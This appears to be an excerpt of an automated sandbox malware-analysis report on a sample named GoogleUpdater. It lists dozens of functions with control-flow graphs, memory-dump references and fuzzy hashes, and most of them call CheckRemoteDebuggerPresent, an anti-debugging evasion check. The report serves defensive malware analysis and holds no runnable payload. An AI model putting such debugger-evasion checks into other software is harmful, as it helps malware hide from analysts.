                                                                                                                                                                                                                                            control_flow_graph 180 ec1161-ec1163 181 ec119a-ec11a2 180->181 182 ec1165-ec1168 180->182 183 ec11a8-ec11b2 181->183 184 ec1283-ec141c CheckRemoteDebuggerPresent 181->184 182->181 183->184 185 ec11b8-ec11bf 183->185 189 ec141e-ec1424 184->189 190 ec1425-ec1460 184->190 185->184 186 ec11c5-ec11d1 185->186 186->184 189->190
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1b1f52a90003c99f46587d136ac9cc061052bc36aa85eae4eb762eced96d6f5a
                                                                                                                                                                                                                                            • Instruction ID: 00e7d929cbca87f90423d7311f2abae62d61de3623f6c3cf9de070463a2dd6c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b1f52a90003c99f46587d136ac9cc061052bc36aa85eae4eb762eced96d6f5a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C671E83184D3C58FCB12CFA888699D9BFB19F17210B1886DFC48597E43D22E850BCB92
                                                                                                                                                                                                                                            Function 00EC10C5 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 193 ec10c5-ec10c7 194 ec10cd-ec10d4 193->194 195 ec1283-ec141c CheckRemoteDebuggerPresent 193->195 194->195 196 ec10da-ec10e4 194->196 201 ec141e-ec1424 195->201 202 ec1425-ec1460 195->202 196->195 197 ec10ea-ec10f1 196->197 197->195 199 ec10f7-ec1104 197->199 199->195 201->202
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: bdac0c63498e00f35e139458da8fc3420fa162148b49bce55f3af3e6863df65a
                                                                                                                                                                                                                                            • Instruction ID: 3dbf86c6bad6fd917a68afa33bb8039e39a0a283cadb56b2ecfb888a6c76fd7d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bdac0c63498e00f35e139458da8fc3420fa162148b49bce55f3af3e6863df65a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD71B63084D3C58FCB12CFA888699D9BFB19F13210B1886DFC48597E53D62E950BCB92
                                                                                                                                                                                                                                            Function 00EC1193 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 205 ec1193-ec1195 206 ec119b-ec11a2 205->206 207 ec1283-ec141c CheckRemoteDebuggerPresent 205->207 206->207 208 ec11a8-ec11b2 206->208 213 ec141e-ec1424 207->213 214 ec1425-ec1460 207->214 208->207 210 ec11b8-ec11bf 208->210 210->207 211 ec11c5-ec11d1 210->211 211->207 213->214
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: d3de9678efee461e318a3efaf1fafdd6186a3b73925909f3d68a3b726f4090a1
                                                                                                                                                                                                                                            • Instruction ID: 7afaae196574f14f05bef21d34f30fc644dd97d9c6cf285b0c9cd16205afebf9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d3de9678efee461e318a3efaf1fafdd6186a3b73925909f3d68a3b726f4090a1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6871C73184D3C58FCB12CFA888699D9BFB19F17210B1886DFC48597E43D22E950BCB52
                                                                                                                                                                                                                                            Function 00EC0FC0 Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 217 ec0fc0-ec0fda 219 ec0fe0-ec0ff1 217->219 220 ec1283-ec141c CheckRemoteDebuggerPresent 217->220 219->220 223 ec141e-ec1424 220->223 224 ec1425-ec1460 220->224 223->224
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 20d1a96b3e208070b1636763c435dc2e466e6c2f412c0c21ffd6fccbc76d1181
                                                                                                                                                                                                                                            • Instruction ID: eddc244ecd97030dca26cb8f2f6543734005ebe70100bc3594b1858eb445c4c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20d1a96b3e208070b1636763c435dc2e466e6c2f412c0c21ffd6fccbc76d1181
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1761B93084D3C58FCB12CFA888659D9BFB19F17220F1886DFC48597A93D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC1252 Relevance: 1.7, APIs: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 227 ec1252-ec1254 228 ec1256-ec125d 227->228 229 ec1283-ec141c CheckRemoteDebuggerPresent 227->229 228->229 230 ec125f-ec1266 228->230 234 ec141e-ec1424 229->234 235 ec1425-ec1460 229->235 230->229 232 ec1268-ec1271 230->232 232->229 234->235
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 1248e6f8764a80637340c53b7de679a7d25ff343aaa70513092cba06233dabe7
                                                                                                                                                                                                                                            • Instruction ID: a0a980f6bde29753d1008e720b038c387e7edd27e722ccc935668fda8d97220f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1248e6f8764a80637340c53b7de679a7d25ff343aaa70513092cba06233dabe7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE61C83184D3C58FCB12CBA888699D9BFB19F13220B1886DFC485D7E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC0CA6 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 258 ec0ca6-ec0ca8 259 ec0cae-ec0cb5 258->259 260 ec1283-ec141c CheckRemoteDebuggerPresent 258->260 259->260 261 ec0cbb-ec0cc8 259->261 264 ec141e-ec1424 260->264 265 ec1425-ec1460 260->265 261->260 264->265
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 1f4030a5e3f0a7673c36ec83aa46628bb6d662082583b50d2c0b036487ab0620
                                                                                                                                                                                                                                            • Instruction ID: d1c02635868052fcfcd9bfade5409720c5c0dddb4a856bb646b952742f47ca50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f4030a5e3f0a7673c36ec83aa46628bb6d662082583b50d2c0b036487ab0620
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E61B83084D3C58FCB12CBA888699D9BFB19F17210B1886DFC485A7E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC0C79 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 248 ec0c79-ec0c7b 249 ec0c81-ec0c88 248->249 250 ec1283-ec141c CheckRemoteDebuggerPresent 248->250 249->250 251 ec0c8e-ec0c9a 249->251 254 ec141e-ec1424 250->254 255 ec1425-ec1460 250->255 251->250 254->255
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 260bac1e3de6e3529c3d819c9d971811008200ee059c472a1484ea55beb22a96
                                                                                                                                                                                                                                            • Instruction ID: 2950108cc94dfa02752d624305b5f2bbb00b049d0b3a64d8f47bbe0fc63bab39
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 260bac1e3de6e3529c3d819c9d971811008200ee059c472a1484ea55beb22a96
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1461C93084D3C58FCB12CBA88869AD9BFB19F13210F1886DFC48597E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC103D Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 27ce6fd6e43c2594026c8e8bffcb7dc1bee1e773a6b3a15fe011be61cf2b1d47
                                                                                                                                                                                                                                            • Instruction ID: 8b2c44d3751e1ca5dbda639ab8fd2a07a16f2e57f6a0dc04b3bdb5a6f44c953d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27ce6fd6e43c2594026c8e8bffcb7dc1bee1e773a6b3a15fe011be61cf2b1d47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7061D87184D3C58FCB12CBA888699C9BFB19F13210F1886DFC48597E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC100F Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 9b76237ac97eda0698278676af6b3e033a6ee902869b4835e1f82c9b78097983
                                                                                                                                                                                                                                            • Instruction ID: 5b767d084911c1bd8c43f2d737e73bcb0df9fe3149049d66ed92daa2d1873228
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9b76237ac97eda0698278676af6b3e033a6ee902869b4835e1f82c9b78097983
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7261C83084D3C58FCB52CBA888699D9BFB59F13210F5886DFC48597E83D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC0DF0 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 268 ec0df0-ec0df2 269 ec0df8-ec0dff 268->269 270 ec1283-ec141c CheckRemoteDebuggerPresent 268->270 269->270 271 ec0e05-ec0e11 269->271 274 ec141e-ec1424 270->274 275 ec1425-ec1460 270->275 271->270 274->275
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: e486fdfe5dac557de4857da9dc7227f1beb6b88bff9bc7b27de55f92ad689904
                                                                                                                                                                                                                                            • Instruction ID: 608e5e5de3484dc5681d02efcb0a666601e029253c7fc111b4c0f4b100fd5dd7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e486fdfe5dac557de4857da9dc7227f1beb6b88bff9bc7b27de55f92ad689904
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0861B73184D3C58FCB12CFA888699D9BFB19F13210B1886DFC48597E83D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC11DD Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 16598fd1ba8c45d57f9f902dd7e652a98616ca43a093dffe2c28598fcc30abf4
                                                                                                                                                                                                                                            • Instruction ID: 89b1f7769a160fc9cc255ce79175e6633c6c1c789eeb3fbfda276d5ca4df9efe
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16598fd1ba8c45d57f9f902dd7e652a98616ca43a093dffe2c28598fcc30abf4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB61C83084D3C58FCB12CBA888699C9BFB19F13220F5886DFC48597E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC1110 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 355148b133a30f45f5055153b2997406171ead3e53570a194d19b272a4689e9b
                                                                                                                                                                                                                                            • Instruction ID: 6030cd1b766497d3e9f3dd6d5f5ecc69d706157272392c0297e28d801e622669
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 355148b133a30f45f5055153b2997406171ead3e53570a194d19b272a4689e9b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B761B93084D7C58FCB12CBA888699D9BFB19F13220F1886DFC48597E53D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC0EEB Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 80e9403138eb1d702f058568cf8b312c268571f51d6812af723eafb461b8ea12
                                                                                                                                                                                                                                            • Instruction ID: dedb613ee703fde7f49b90c821918c77384f2ea544a15736d7222b0e67b52081
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80e9403138eb1d702f058568cf8b312c268571f51d6812af723eafb461b8ea12
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A461B83184D3C58FCB12CBA888699D9BFB19F17210F1886DFC48597E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC0B8C Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 238 ec0b8c-ec0b8e 239 ec0b94-ec0b9b 238->239 240 ec1283-ec141c CheckRemoteDebuggerPresent 238->240 239->240 241 ec0ba1-ec0bae 239->241 244 ec141e-ec1424 240->244 245 ec1425-ec1460 240->245 241->240 244->245
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 2e246183527d2e84fbe9201ace6b5310e9293b9e1687e2b7f05c85d49c8a3ce5
                                                                                                                                                                                                                                            • Instruction ID: df67c13ecf686543e9aa98fdc4238256420c5e38c340f0af4994a96c060e181a
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e246183527d2e84fbe9201ace6b5310e9293b9e1687e2b7f05c85d49c8a3ce5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B61C93084D3C58FCB52CBA888699D9BFB19F13210B5886DFC485D7E43D66E850BCB56
                                                                                                                                                                                                                                            Function 00EC0F37 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: 3da078ce16a90038def4a3833a0eab757403f5ada65de752a0b9bc5d4d0dfe41
                                                                                                                                                                                                                                            • Instruction ID: e3e50882de7bd760bb3ec3b1003c4de8138686a00853c9ea6d8cefcc75b92d93
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3da078ce16a90038def4a3833a0eab757403f5ada65de752a0b9bc5d4d0dfe41
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4561B73184D3C58FCB12CBA888699D9BFB19F13210F5886DFC48597E43D62E850BCB56
                                                                                                                                                                                                                                            Function 00EC1208 Relevance: 1.7, APIs: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 51227baaca9d40a1acf84004c2fbeb5c622f57efccc96e4d26029556d66d982e
                                                                                                                                                                                                                                            • Instruction ID: a4bdcc8fd4949e622ba9d64ebd32fe3418fef587ffbf4f32fcf226864788fc10
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51227baaca9d40a1acf84004c2fbeb5c622f57efccc96e4d26029556d66d982e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9261B93084D3C58FCB12CFA888699D9BFB19F13210F1886DFC48597A43D62E950BCB56
                                                                                                                                                                                                                                            Function 00EC1068 Relevance: 1.7, APIs: 1, Instructions: 183COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: d4b476ac5256453e4ea054288ae43e7d262ad3f740ecfb6b9a32704ee6c05f2e
                                                                                                                                                                                                                                            • Instruction ID: b6a495751afe951236ed0bc60af1ab5ed0d18b8f8a00240a2edec519d3fffb50
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4b476ac5256453e4ea054288ae43e7d262ad3f740ecfb6b9a32704ee6c05f2e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C61B83084D3C58FCB12CBA988699D9BFB19F12210F5886DFC48597A43D62E950BCB56
                                                                                                                                                                                                                                            Function 00EC1290 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CheckDebuggerPresentRemote
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3662101638-0
                                                                                                                                                                                                                                            • Opcode ID: f90198bcc89a1182ea02ef6e587c8a5227bf907eba08ed83e8c606c2e883e18f
                                                                                                                                                                                                                                            • Instruction ID: caf52d47046c2fe83f608a6fd7ca404ded7b08543394e6ec0348ee22fc9a8b5d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f90198bcc89a1182ea02ef6e587c8a5227bf907eba08ed83e8c606c2e883e18f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B51D83084D3C58FCB12CBAC88695D9BFB19F12220F5886DFC485A7E43D66E850BCB56
                                                                                                                                                                                                                                            Function 00EC1398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 00EC140F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.4564641763.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_ec0000_GoogleUpdater.jbxd
